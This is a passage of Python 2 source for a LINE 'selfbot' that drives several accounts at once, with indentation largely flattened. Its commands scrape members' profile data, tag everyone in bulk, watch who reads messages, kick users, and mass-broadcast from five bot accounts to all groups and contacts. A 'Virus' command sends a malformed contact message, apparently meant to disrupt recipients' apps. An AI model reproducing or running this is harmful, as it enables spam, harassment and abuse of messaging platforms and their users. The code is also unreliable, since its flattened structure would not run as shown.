if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Cancel Protection Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already ON✔")
else:
acil.sendText(msg.to,"It is already On ✔")
#=====================================================================================
if msg.text in ["Allprotect:off"]:
if msg.from_ in PRANKBOT:
if wait["protect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Disable ✔")
else:
acil.sendText(msg.to,"sudah dimatikan ✔")
else:
wait["protect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close")
else:
acil.sendText(msg.to,"It is already open ✔")
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
if msg.to in wait['pname']:
acil.sendText(msg.to,"TURN OFF")
del wait['pname'][msg.to]
else:
acil.sendText(msg.to,"ALREADY OFF")
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Cancel Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
#==================================================
if "Admin:add " in msg.text:
if msg.from_ in PRANKBOT:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["ACIL"][target] = True
f=codecs.open('st2__a.json','w','utf-8')
json.dump(wait["ACIL"], f, sort_keys=True, indent=4,ensure_ascii=False)
acil.sendText(msg.to,"OWNER MENAMBAHKAN ADMIN")
print "[Admin]DITAMBAHKAN"
except:
pass
if "Admin:del @" in msg.text:
if msg.from_ in PRANKBOT:
if msg.toType == 2:
print "[Admin]DIHAPUS"
_name = msg.text.replace("Admin:del @","")
_nametarget = _name.rstrip()
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["ACIL"][target]
f=codecs.open('st2__a.json','w','utf-8')
json.dump(wait["ACIL"], f, sort_keys=True, indent=4,ensure_ascii=False)
acil.sendText(msg.to,"Target Unlocked")
except:
acil.sendText(msg.to,"Error")
if msg.text in ["Listadmin","Adminlist"]:
if wait["ACIL"] == {}:
acil.sendText(msg.to,"No user is ADMIN")
else:
mc = " 🛡️==||ADMIN||==🛡️\n"
for mi_d in wait["ACIL"]:
mc += "🗜️" +acil.getContact(mi_d).displayName + "\n"
acil.sendText(msg.to,mc)
if "Getvid @" in msg.text:
if msg.from_ in PRANKBOT:
print "[Command]dp executing"
_name = msg.text.replace("Getvid @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendVideoWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
if "Getcontact" in msg.text:
if msg.from_ in PRANKBOT:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = acil.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
acil.sendMessage(msg)
if "Getname" in msg.text:
if msg.from_ in PRANKBOT:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = acil.getContact(key1)
cu = acil.channel.getCover(key1)
try:
acil.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
acil.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
if msg.text in ["Myname"]:
if msg.from_ in PRANKBOT:
h = acil.getContact(msg.from_)
acil.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
if msg.text in ["Mybio"]:
if msg.from_ in PRANKBOT:
h = acil.getContact(msg.from_)
acil.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
if msg.text in ["Mypict"]:
if msg.from_ in PRANKBOT:
h = acil.getContact(msg.from_)
acil.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
if msg.text in ["Myvid"]:
if msg.from_ in PRANKBOT:
h = acil.getContact(msg.from_)
acil.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
if msg.text in ["Urlpict"]:
if msg.from_ in PRANKBOT:
h = acil.getContact(msg.from_)
acil.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
if msg.text in ["Mycover"]:
if msg.from_ in PRANKBOT:
h = acil.getContact(msg.from_)
cu = acil.channel.getCover(msg.from_)
path = str(cu)
acil.sendImageWithURL(msg.to, path)
if msg.text in ["Urlcover"]:
if msg.from_ in PRANKBOT:
h = acil.getContact(msg.from_)
cu = acil.channel.getCover(msg.from_)
path = str(cu)
acil.sendText(msg.to, path)
if "Getmid @" in msg.text:
if msg.from_ in PRANKBOT:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
acil.sendText(msg.to, g.mid)
else:
pass
if "Wc" in msg.text:
if msg.from_ in PRANKBOT:
ginfo = acil.getGroup(msg.to)
acil.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
acil.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
if "Say " in msg.text:
if msg.from_ in PRANKBOT:
bctxt = msg.text.replace("Say ","")
acil.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
#======ADMIN======
if "Help" == msg.text:
if msg.from_ in wait["ACIL"]:
if wait["lang"] == "JP":
acil.sendText(msg.to,helpMessage1)
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
acil.sendMessage(msg)
else:
acil.sendText(msg.to,helpMessage1)
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
if "Me" == msg.text:
if msg.from_ in wait["ACIL"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
acil.sendMessage(msg)
h = acil.getContact(msg.from_)
acil.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
if "Respon" == msg.text:
if msg.from_ in wait["ACIL"]:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
ki.sendText(msg.to,"AMAN TERKENDALI KOMANDAN 👮")
if "Getvid @" in msg.text:
if msg.from_ in wait["ACIL"]:
print "[Command]dp executing"
_name = msg.text.replace("Getvid @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendVideoWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
if "Getcontact" in msg.text:
if msg.from_ in wait["ACIL"]:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = acil.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
acil.sendMessage(msg)
if "Getname" in msg.text:
if msg.from_ in wait["ACIL"]:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = acil.getContact(key1)
cu = acil.channel.getCover(key1)
try:
acil.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
acil.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
if msg.text in ["Myname"]:
if msg.from_ in wait["ACIL"]:
h = acil.getContact(msg.from_)
acil.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
if msg.text in ["Mybio"]:
if msg.from_ in wait["ACIL"]:
h = acil.getContact(msg.from_)
acil.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
if msg.text in ["Mypict"]:
if msg.from_ in wait["ACIL"]:
h = acil.getContact(msg.from_)
acil.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
if msg.text in ["Myvid"]:
if msg.from_ in wait["ACIL"]:
h = acil.getContact(msg.from_)
acil.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
if msg.text in ["Urlpict"]:
if msg.from_ in wait["ACIL"]:
h = acil.getContact(msg.from_)
acil.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
if msg.text in ["Mycover"]:
if msg.from_ in wait["ACIL"]:
h = acil.getContact(msg.from_)
cu = acil.channel.getCover(msg.from_)
path = str(cu)
acil.sendImageWithURL(msg.to, path)
if msg.text in ["Urlcover"]:
if msg.from_ in wait["ACIL"]:
h = acil.getContact(msg.from_)
cu = acil.channel.getCover(msg.from_)
path = str(cu)
acil.sendText(msg.to, path)
if "Getmid @" in msg.text:
if msg.from_ in wait["ACIL"]:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
acil.sendText(msg.to, g.mid)
else:
pass
if "Wc" in msg.text:
if msg.from_ in wait["ACIL"]:
ginfo = acil.getGroup(msg.to)
acil.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
acil.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
if "Say " in msg.text:
if msg.from_ in wait["ACIL"]:
bctxt = msg.text.replace("Say ","")
acil.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
if "Youinfo" in msg.text:
if msg.from_ in wait["ACIL"]:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = acil.getContact(key1)
cu = acil.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
acil.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
acil.sendText(msg.to,"Profile Picture " + contact.displayName)
acil.sendImageWithURL(msg.to,image)
acil.sendText(msg.to,"Cover " + contact.displayName)
acil.sendImageWithURL(msg.to,path)
except:
pass
if "Tagall" in msg.text:
if msg.from_ in wait["ACIL"]:
group = acil.getGroup(msg.to)
                    k = len(group.members)//200 # one mention message per 200 members
                    for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*200 : (j+1)*200]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
ki.sendMessage(msg)
if "Sider:on" in msg.text:
if msg.from_ in wait["ACIL"]:
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
wait["Sider"] = True
acil.sendText(msg.to,"Siap On Cek Sider")
if "Sider:off" in msg.text:
if msg.from_ in wait["ACIL"]:
cctv['cyduk'][msg.to]=False
wait["Sider"] = False
acil.sendText(msg.to, "Cek Sider Off")
if "Github " in msg.text:
if msg.from_ in wait["ACIL"]:
a = msg.text.replace("Github ","")
b = urllib.quote(a)
acil.sendText(msg.to,"「 Searching 」\n" "Type: GitHub Search\nStatus: Processing...")
acil.sendText(msg.to, "Title: " + a + "\nLink: https://github.com/search?utf8=✓&q="+b)
if "Playstore " in msg.text:
tob = msg.text.replace("Playstore ","")
acil.sendText(msg.to,"Please wait...")
acil.sendText(msg.to,"Title : "+tob+"\nSource : Google Play\nLinknya : https://play.google.com/store/search?q=" + tob)
acil.sendText(msg.to,"This is link aplication")
if "Wikipedia " in msg.text:
if msg.from_ in wait["ACIL"]:
try:
wiki = msg.text.replace("Wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
acil.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
acil.sendText(msg.to, pesan)
except Exception as e:
acil.sendText(msg.to, str(e))
if "Twitter " in msg.text:
if msg.from_ in wait["ACIL"]:
a = msg.text.replace("Twitter ","")
b = urllib.quote(a)
acil.sendText(msg.to,"「 Searching 」\n" "Type:Search Info\nStatus: Processing")
acil.sendText(msg.to, "https://www.twitter.com" + b)
acil.sendText(msg.to,"「 Searching 」\n" "Type:Search Info\nStatus: Success")
if "Smule " in msg.text:
if msg.from_ in wait["ACIL"]:
a = msg.text.replace("Smule ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching to id smule..")
acil.sendText(msg.to, "Nama: "+b+"\nId smule: http://smule.com/" +b)
#------------------------------------------------------------
if msg.text in ["Invite:user"]:
if msg.from_ in wait["ACIL"]:
wait["invite"] = True
acil.sendText(msg.to,"send contact 😉")
if "Google " in msg.text:
if msg.from_ in wait["ACIL"]:
a = msg.text.replace("Google ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching google..")
acil.sendText(msg.to, "Search: "+b+"\nsuccess: http://google.com/" +b)
if "Xvideos " in msg.text:
if msg.from_ in wait["ACIL"]:
a = msg.text.replace("Xvideos ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching ....\n" "Type:Search Xvideos\nStatus: Processing")
acil.sendText(msg.to, "{ Xvideos search page }\n\nTitle: "+b+"\nSource : Xvideos\nhttp://xvideos.com/?k=" +b)
if "Picturl @" in msg.text:
if msg.from_ in wait["ACIL"]:
print "[Command]dp executing"
_name = msg.text.replace("Picturl @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
if "Coverurl @" in msg.text:
if msg.from_ in wait["ACIL"]:
print "[Command]cover executing"
_name = msg.text.replace("Coverurl @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
cu = acil.channel.getCover(target)
path = str(cu)
acil.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
acil.sendText(msg.to,"sudah masuk daftar hitam👈")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
acil.sendText(msg.to,"Itu tidak berkomentar👈")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
acil.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
acil.sendText(msg.to,"Tidak ada dalam daftar hitam👈")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
acil.sendText(msg.to,"sudah masuk daftar hitam")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
acil.sendText(msg.to,"Done👈")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
acil.sendText(msg.to,"Done👈")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
acil.sendText(msg.to,"Done👈")
elif wait["contact"] == True:
msg.contentType = 0
acil.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = acil.getContact(msg.contentMetadata["mid"])
try:
cu = acil.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
acil.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = acil.getContact(msg.contentMetadata["mid"])
try:
cu = acil.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
try:
acil.sendImageWithURL(msg.to, "http://dl.profile.line-cdn.net/" + contact.pictureStatus)
except:
cu = ""
acil.sendText(msg.to,"🎀═displayName═🎀\n✤[" + contact.displayName + "]✤\n🎀═MIDs═🎀\n✤[" + msg.contentMetadata["mid"] + "]✤\n🎀═StatusContact═🎀\n✤" + contact.statusMessage + "✤")
acil.sendText(msg.to,"LINKPROFILE\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\nLINKBERANDA\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
acil.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Botallbye"]: #asist akan keluar dari smua grup
gid = ki.getGroupIdsJoined()
gid = ki2.getGroupIdsJoined()
gid = ki3.getGroupIdsJoined()
gid = ki4.getGroupIdsJoined()
gid = ki5.getGroupIdsJoined()
for i in gid:
ki.leaveGroup(i)
ki2.leaveGroup(i)
ki3.leaveGroup(i)
ki4.leaveGroup(i)
ki5.leaveGroup(i)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nBots Dipaksa Keluar oleh selfbot...!!!\nMakasih...!!!")
else:
acil.sendText(msg.to,"He declined all invitations")
#--------------------------
elif msg.text in ["Leaveallgroup"]: #selfbot akan keluar dari semua grup
gid = acil.getGroupIdsJoined()
for i in gid:
acil.leaveGroup(i)
if wait["lang"] == "JP":
acil.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nBots Dipaksa Keluar oleh selfbot...!!!\nMakasih...!!!")
else:
acil.sendText(msg.to,"He declined all invitations")
#----------------------------------------------
elif "Sendgrup " in msg.text: #ini broadcast sob
bctxt = msg.text.replace("Sendgrup ", "")
n = acil.getGroupIdsJoined()
for manusia in n:
acil.sendText(manusia, (bctxt))
elif "Sendcontact " in msg.text: #SEMUA BOT AKAN BROADCAST KE SEMUA KONTAKNYA
bctxt = msg.text.replace("Sendcontact ", "")
t = ki.getAllContactIds()
t = ki2.getAllContactIds()
t = ki3.getAllContactIds()
t = ki4.getAllContactIds()
t = ki5.getAllContactIds()
for manusia in t:
ki.sendText(manusia,(bctxt))
ki2.sendText(manusia,(bctxt))
ki3.sendText(manusia,(bctxt))
ki4.sendText(manusia,(bctxt))
ki5.sendText(manusia,(bctxt))
elif "Sendpm " in msg.text: #SB AKAN BROADCAST KE SEMUA TMN NYA
bctxt = msg.text.replace("Sendpm ", "")
t = acil.getAllContactIds()
for manusia in t:
acil.sendText(manusia, (bctxt))
elif "Virus" in msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': "BEBAS,'"}
acil.sendMessage(msg)
elif msg.text in ["Stafflist"]:
if Bots == []:
acil.sendText(msg.to,"The Friends is empty")
else:
acil.sendText(msg.to,"Tunggu...")
mc = "||===FRIENDLIST===||\n=====================\n"
for mi_d in Bots:
mc += "★" +acil.getContact(mi_d).displayName + "\n"
acil.sendText(msg.to,mc)
print "[Command]Friendlist executed"
elif "Youinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = acil.getContact(key1)
cu = acil.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
acil.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
acil.sendText(msg.to,"Profile Picture " + contact.displayName)
acil.sendImageWithURL(msg.to,image)
acil.sendText(msg.to,"Cover " + contact.displayName)
acil.sendImageWithURL(msg.to,path)
except:
pass
elif "Botak" in msg.text:
group = acil.getGroup(msg.to)
                k = len(group.members)//200 # one mention message per 200 members
                for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*200 : (j+1)*200]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
ki.sendMessage(msg)
elif "Github " in msg.text:
a = msg.text.replace("Github ","")
b = urllib.quote(a)
acil.sendText(msg.to,"「 Searching 」\n" "Type: GitHub Search\nStatus: Processing...")
acil.sendText(msg.to, "Title: " + a + "\nLink: https://github.com/search?utf8=✓&q="+b)
elif 'playstore ' in msg.text.lower():
tob = msg.text.lower().replace('playstore ',"")
acil.sendText(msg.to,"Please wait...")
acil.sendText(msg.to,"Title : "+tob+"\nSource : Google Play\nLinknya : https://play.google.com/store/search?q=" + tob)
acil.sendText(msg.to,"This is link aplication")
elif "Wikipedia " in msg.text:
try:
wiki = msg.text.lower().replace("Wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
acil.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
acil.sendText(msg.to, pesan)
except Exception as e:
acil.sendText(msg.to, str(e))
elif "Twitter " in msg.text:
a = msg.text.replace("Twitter ","")
b = urllib.quote(a)
acil.sendText(msg.to,"「 Searching 」\n" "Type:Search Info\nStatus: Processing")
acil.sendText(msg.to, "https://www.twitter.com" + b)
acil.sendText(msg.to,"「 Searching 」\n" "Type:Search Info\nStatus: Success")
elif "Smule " in msg.text:
a = msg.text.replace("Smule ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching to id smule..")
acil.sendText(msg.to, "Nama: "+b+"\nId smule: http://smule.com/" +b)
elif "Google " in msg.text:
a = msg.text.replace("Google ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching google..")
acil.sendText(msg.to, "Search: "+b+"\nsuccess: http://google.com/" +b)
elif "Xvideos " in msg.text:
a = msg.text.replace("Xvideos ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching ....\n" "Type:Search Xvideos\nStatus: Processing")
acil.sendText(msg.to, "{ Xvideos search page }\n\nTitle: "+b+"\nSource : Xvideos\nhttp://xvideos.com/?k=" +b)
elif "Picturl @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Picturl @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Coverurl @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Coverurl @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
cu = acil.channel.getCover(target)
path = str(cu)
acil.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif msg.text in ["Pmfavorite"]:
dj = acil.getFavoriteMids()
kontak = acil.getContacts(dj)
num = 1
family = str(len(dj))
msgs = "[List Favorite Friends Guys]"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\nTotal Friend : %i" % len(kontak)
acil.sendText(msg.to, msgs)
elif msg.text.lower() == 'setauto':
acil.sendText(msg.to,helpFun)
elif msg.text.lower() == 'help':
if wait["lang"] == "JP":
acil.sendText(msg.to,helpMessage)
else:
acil.sendText(msg.to,helpMessage)
elif msg.text.lower() == 'media':
if wait["lang"] == "JP":
acil.sendText(msg.to,helpMedia)
else:
acil.sendText(msg.to,helpMedia)
elif msg.text.lower() == 'helpbots':
if wait["lang"] == "JP":
ki.sendText(msg.to,helpself)
else:
acil.sendText(msg.to,helpself)
elif msg.text.lower() == 'settings':
if wait["lang"] == "JP":
acil.sendText(msg.to,helpset)
else:
acil.sendText(msg.to,helpset)
elif ("Gn:" in msg.text):
if msg.toType == 2:
group = acil.getGroup(msg.to)
group.name = msg.text.replace("Gn:","")
ki.updateGroup(group)
else:
acil.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok👈")
elif ("Gn " in msg.text):
if msg.toType == 2:
group = acil.getGroup(msg.to)
group.name = msg.text.replace("Gn ","")
acil.updateGroup(group)
else:
acil.sendText(msg.to,"Can not be used for groups other than")
elif "Kick:" in msg.text:
midd = msg.text.replace("Kick:","")
acil.kickoutFromGroup(msg.to,[midd])
elif "Invite:" in msg.text:
midd = msg.text.replace("Invite:","")
acil.findAndAddContactsByMid(midd)
acil.inviteIntoGroup(msg.to,[midd])
elif "Me" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
acil.sendMessage(msg)
eltime = time.time() - mulai
van = "Bot has been active "+waktu(eltime)
acil.sendText(msg.to,van)
elif "Mybots" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
acil.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
acil.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
acil.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
acil.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
acil.sendMessage(msg)
elif "Respon" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
ki.sendText(msg.to,"AMAN TERKENDALI KOMANDAN 👮")
elif "B1" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
elif "B2" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
elif "B3" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
elif "B4" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
elif "B5" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
elif "Creator" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
acil.sendMessage(msg)
elif msg.text in ["Allgift","B1 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text in ["Gift","i gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
